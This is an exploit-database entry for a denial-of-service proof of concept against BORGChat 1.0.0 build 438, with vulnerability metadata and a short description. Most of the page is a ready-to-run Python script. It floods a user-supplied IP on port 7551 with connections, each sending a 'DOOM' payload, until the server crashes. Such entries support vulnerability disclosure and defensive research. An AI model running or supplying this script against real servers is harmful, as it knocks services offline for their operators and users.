BORGChat 1.0.0 build 438 - Denial of Service (PoC)

vendor:

BORGChat

by:

Ihsan Sencan

7.5

CVSS

HIGH

Denial of Service

N/A

CWE

Product Name: BORGChat

Affected Version From: 1.0.0 build 438

Affected Version To: 1.0.0 build 438

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: WiN7_x64/KaLiLinuX_x64

2018

BORGChat 1.0.0 build 438 – Denial of Service (PoC)

BORGChat 1.0.0 build 438 is vulnerable to a denial of service attack. An attacker can send a specially crafted 'DOOM' packet to the target system, causing it to crash. This can be done by using a python script to send multiple 'DOOM' packets to the target system.

Mitigation:

The vendor should patch the vulnerability by implementing proper input validation and sanitization.

Source

Exploit-DB raw data:

# Exploit Title: BORGChat 1.0.0 build 438 - Denial of Service (PoC)
# Dork: N/A
# Date: 2018-10-22
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://borgchat.10n.ro
# Software Link: http://borgchat.10n.ro/download.php
# Version: 1.0.0 build 438
# Category: Dos
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A

# POC: 
# 1)

#!/usr/bin/python
import socket
print "# # # # # # # #"
print "BORGChat 1.0.0"
print "# # # # # # # #"
print "\r\n"
Ip = raw_input("[Ip]: ")
Port = 7551 # Default port

arr=[]
c=0
while 1:
    try:
        arr.append(socket.create_connection((Ip,Port)))
        arr[c].send("DOOM")
        print "Sie!"
        c+=1
    except socket.error: 
        print "++ Done! ++"
        raw_input()
        break